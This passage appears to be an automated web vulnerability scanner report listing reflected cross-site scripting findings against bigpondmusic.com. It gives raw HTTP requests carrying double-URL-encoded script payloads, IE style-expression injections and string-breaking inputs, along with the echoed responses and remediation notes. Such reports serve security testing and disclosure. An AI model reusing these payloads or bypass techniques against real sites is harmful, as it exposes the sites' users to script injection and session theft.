The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4b4e'%3baede1c38fe1 was submitted in the REST URL parameter 1. This input was echoed as c4b4e';aede1c38fe1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumc4b4e'%3baede1c38fe1/mike-posner/cooler-than-me3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88147


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumc4b4e';aede1c38fe1';
   s.prop4 = 'mike-posner';
   s.prop5 = 'cooler-than-me3';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.pro
...[SNIP]...

2.97. http://bigpondmusic.com/album/mike-posner/cooler-than-me3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mike-posner/cooler-than-me3

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e883376e85ac was submitted in the REST URL parameter 1. This input was echoed as fed7f"><script>alert(1)</script>883376e85ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumfed7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e883376e85ac/mike-posner/cooler-than-me3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88125


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumfed7f"><script>alert(1)</script>883376e85ac/mike-posner/cooler-than-me3" />
...[SNIP]...

2.98. http://bigpondmusic.com/album/mike-posner/cooler-than-me3 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mike-posner/cooler-than-me3

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8f38"style%3d"x%3aexpression(alert(1))"76db599ad81 was submitted in the h parameter. This input was echoed as a8f38"style="x:expression(alert(1))"76db599ad81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/mike-posner/cooler-than-me3?h=694323401a8f38"style%3d"x%3aexpression(alert(1))"76db599ad81 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:24:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105771


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Mike Posner - Cooler Than Me
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mike-posner/cooler-than-me3?h=694323401a8f38"style="x:expression(alert(1))"76db599ad81" />
...[SNIP]...

2.99. http://bigpondmusic.com/album/mike-posner/cooler-than-me3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mike-posner/cooler-than-me3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b9d9"style%3d"x%3aexpression(alert(1))"39133f9d96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b9d9"style="x:expression(alert(1))"39133f9d96c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/mike-posner/cooler-than-me3?9b9d9"style%3d"x%3aexpression(alert(1))"39133f9d96c=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105430


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Mike Posner - Cooler Than Me
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mike-posner/cooler-than-me3?9b9d9"style="x:expression(alert(1))"39133f9d96c=1" />
...[SNIP]...

2.100. http://bigpondmusic.com/album/nelly/5-0-deluxe [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/5-0-deluxe

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d31e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1e077d3c14 was submitted in the REST URL parameter 1. This input was echoed as d31e9"><script>alert(1)</script>c1e077d3c14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumd31e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1e077d3c14/nelly/5-0-deluxe HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87913


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumd31e9"><script>alert(1)</script>c1e077d3c14/nelly/5-0-deluxe" />
...[SNIP]...

2.101. http://bigpondmusic.com/album/nelly/5-0-deluxe [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/nelly/5-0-deluxe

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c014'%3babb2e6a640f was submitted in the REST URL parameter 1. This input was echoed as 4c014';abb2e6a640f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album4c014'%3babb2e6a640f/nelly/5-0-deluxe HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88199


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album4c014';abb2e6a640f';
   s.prop4 = 'nelly';
   s.prop5 = '5-0-deluxe';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' +
...[SNIP]...

2.102. http://bigpondmusic.com/album/nelly/5-0-deluxe [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/5-0-deluxe

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c434d"style%3d"x%3aexpression(alert(1))"f7c0d253232 was submitted in the h parameter. This input was echoed as c434d"style="x:expression(alert(1))"f7c0d253232 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/nelly/5-0-deluxe?h=771623980c434d"style%3d"x%3aexpression(alert(1))"f7c0d253232 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 124979


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nelly - 5.0 Deluxe - BigPond
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/5-0-deluxe?h=771623980c434d"style="x:expression(alert(1))"f7c0d253232" />
...[SNIP]...

2.103. http://bigpondmusic.com/album/nelly/5-0-deluxe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/5-0-deluxe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eeab"style%3d"x%3aexpression(alert(1))"e125ad515ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5eeab"style="x:expression(alert(1))"e125ad515ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/nelly/5-0-deluxe?5eeab"style%3d"x%3aexpression(alert(1))"e125ad515ce=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 124531


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nelly - 5.0 Deluxe - BigPond
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/5-0-deluxe?5eeab"style="x:expression(alert(1))"e125ad515ce=1" />
...[SNIP]...

2.104. http://bigpondmusic.com/album/nelly/just-a-dream2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/nelly/just-a-dream2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e7a0'%3b8f38f26f47a was submitted in the REST URL parameter 1. This input was echoed as 5e7a0';8f38f26f47a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album5e7a0'%3b8f38f26f47a/nelly/just-a-dream2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87890


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album5e7a0';8f38f26f47a';
   s.prop4 = 'nelly';
   s.prop5 = 'just-a-dream2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|'
...[SNIP]...

2.105. http://bigpondmusic.com/album/nelly/just-a-dream2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/just-a-dream2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c1b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee4c93957b71 was submitted in the REST URL parameter 1. This input was echoed as 6c1b8"><script>alert(1)</script>e4c93957b71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album6c1b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee4c93957b71/nelly/just-a-dream2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88200


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album6c1b8"><script>alert(1)</script>e4c93957b71/nelly/just-a-dream2" />
...[SNIP]...

2.106. http://bigpondmusic.com/album/nelly/just-a-dream2 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/just-a-dream2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa568"style%3d"x%3aexpression(alert(1))"61488da52ac was submitted in the h parameter. This input was echoed as fa568"style="x:expression(alert(1))"61488da52ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/nelly/just-a-dream2?h=726722803fa568"style%3d"x%3aexpression(alert(1))"61488da52ac HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 104044


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nelly - Just A Dream - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/just-a-dream2?h=726722803fa568"style="x:expression(alert(1))"61488da52ac" />
...[SNIP]...

2.107. http://bigpondmusic.com/album/nelly/just-a-dream2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/just-a-dream2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba87f"style%3d"x%3aexpression(alert(1))"31c7e4dd0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba87f"style="x:expression(alert(1))"31c7e4dd0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/nelly/just-a-dream2?ba87f"style%3d"x%3aexpression(alert(1))"31c7e4dd0c=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 103886


